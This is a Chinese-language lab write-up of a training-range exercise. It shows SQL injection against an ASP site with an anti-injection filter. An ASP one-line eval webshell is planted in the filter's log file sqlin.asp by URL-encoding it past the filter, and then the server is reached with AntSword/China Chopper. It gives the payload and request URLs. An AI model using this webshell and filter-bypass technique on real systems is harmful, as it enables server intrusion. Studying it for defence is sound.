實戰(zhàn) - SQL注入滲透網(wǎng)站服務(wù)器(一句話木馬+中國蟻劍)
本教程僅用于技術(shù)交流與學(xué)習(xí),請遵守計算機(jī)網(wǎng)絡(luò)安全相關(guān)法律法規(guī),如使用本技術(shù)進(jìn)行互聯(lián)網(wǎng)犯罪,本人概不負(fù)責(zé)。
前幾個教程,我們講了幾種SQL注入拿取網(wǎng)站后臺管理員賬號密碼的方法,而有時候,我們并不滿足于獲得管理員賬號密碼登陸后臺,我們可能還會對網(wǎng)站的后臺服務(wù)器進(jìn)行滲透,去完成我們的一些需求,這篇教程,我就來分享一下利用SQL注入漏洞滲透網(wǎng)站服務(wù)器的方法。
使用工具:中國蟻劍
攻擊環(huán)境:MacOS?10
被攻擊服務(wù)器環(huán)境:
????????????????????? ? ? ? ? 系統(tǒng):windows 2003
????????????????? ? ? ? ? ? ? 服務(wù)器:access
我們這次教程依舊在靶場進(jìn)行,我們本次使用的靶場是墨者學(xué)院SQL注入實戰(zhàn)(防注入)
我們打開靶場首頁,看到了這個靶場給我們的提示:SQL通用防注入系統(tǒng),記錄寫在數(shù)據(jù)庫文件里了,KEY在目錄下。

既然KEY在網(wǎng)站服務(wù)器目錄下,那么我們的目的就是滲透網(wǎng)站的服務(wù)器去拿到這個KEY;而且這是SQL通用防注入系統(tǒng),百度了一下,這個通用防注入系統(tǒng)存在一個/sqlin.asp,里面存放著防火墻攔截的惡意語句,而且提示也已經(jīng)說明,記錄寫在數(shù)據(jù)庫文件里了。也就是說,如果我們能夠把我們的惡意語句注入到sqlin.asp中,讓我們的惡意語句能夠執(zhí)行,那么,我們就能夠用菜刀連接上數(shù)據(jù)庫服務(wù)器了。
很好,現(xiàn)在想法有了,我們開始實踐。
首先,我們先傳入一段SQL語句,看一下這個網(wǎng)站過濾后會返回什么。


我們看到,當(dāng)我們傳入 and 1=2后,網(wǎng)站的防火墻對我們傳入的sql語句進(jìn)行了一個攔截,而且已經(jīng)在sqlin.asp中做了記錄。那么,我們試試傳入木馬呢?
這個網(wǎng)站是一個asp網(wǎng)站,我們這里要使用asp一句話木馬。
<%eval request("密碼")%>
這里的密碼你可以任意修改,不過要記住,最后使用菜刀的時候會用到。
我這里把密碼設(shè)置成了123。
那么我的payload就為:<%eval request("123")%>
我們進(jìn)行傳入http://219.153.49.228:48058/news.asp?id=1 and?<%eval request("123")%>

不過,當(dāng)我們傳入后,我們看一下網(wǎng)站防火墻給我們傳來的信息,發(fā)現(xiàn)我們提交數(shù)據(jù)只有1 and。我們提交的一句話木馬怎么不見了?想到的可能性應(yīng)該是網(wǎng)站的防火墻在我們傳入一句話木馬后把我們的一句話木馬過濾了。到這里就結(jié)束了嗎?我們可以試試去繞過防火墻。相關(guān)的繞過方法很多,在這里,我采用的是通過url編碼進(jìn)行繞過。

我們把已經(jīng)進(jìn)行url編碼的木馬代碼傳入數(shù)據(jù)庫試試:http://219.153.49.228:48058/news.asp?id=%3C%25eval%20request(%22123%22)%25%3E

我們在提交數(shù)據(jù)處看到了我們的一句話木馬,代表我們的一句話木馬已經(jīng)寫入。
接下來,無所畏懼的上菜刀吧,勝利已經(jīng)近在眼前。

到此,我們成功滲透進(jìn)入網(wǎng)站服務(wù)器,看到了服務(wù)器內(nèi)部的所有文件,接下來,盡情去做想做的事吧。

本教程到此結(jié)束,如果發(fā)現(xiàn)有錯誤請指正,我們可以相互學(xué)習(xí),共同進(jìn)步。